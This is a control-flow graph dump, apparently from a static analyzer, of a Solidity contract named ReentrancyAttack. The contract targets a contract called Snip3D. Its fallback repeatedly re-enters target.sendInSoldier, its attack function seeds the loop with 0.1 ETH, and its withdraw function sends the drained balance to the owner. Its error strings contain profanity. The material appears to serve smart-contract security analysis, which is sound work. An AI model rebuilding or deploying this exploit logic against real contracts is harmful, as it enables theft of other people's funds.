Contract: ReentrancyAttack
==================================================

Function: constructor
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: target = Snip3D(_target)

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: owner = msg.sender

Edges:
  0 -> 1
  1 -> 2

Function: fallback
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.IF
  Expression: reentryCount > 0

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: reentryCount --

  ID: 3
  Type: NodeType.EXPRESSION
  Expression: target.sendInSoldier(address(0))

  ID: 4
  Type: NodeType.ENDIF
  Expression: 

Edges:
  0 -> 1
  1 -> 2
  1 -> 4
  2 -> 3
  3 -> 4

Function: attack
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(msg.value >= 100000000000000000,Send at least 0.1 ETH, dumbass)

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: target.sendInSoldier.value(100000000000000000)(address(0))

Edges:
  0 -> 1
  1 -> 2

Function: withdraw
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(msg.sender == owner,Fuck off, not yours)

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: msg.sender.transfer(address(this).balance)

Edges:
  0 -> 1
  1 -> 2

Function: getBalance
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.RETURN
  Expression: address(this).balance

Edges:
  0 -> 1

Function: slitherConstructorVariables
------------------------------
Nodes:
  ID: 0
  Type: NodeType.OTHER_ENTRYPOINT
  Expression: reentryCount = 2

Edges:


Contract: Snip3D
==================================================


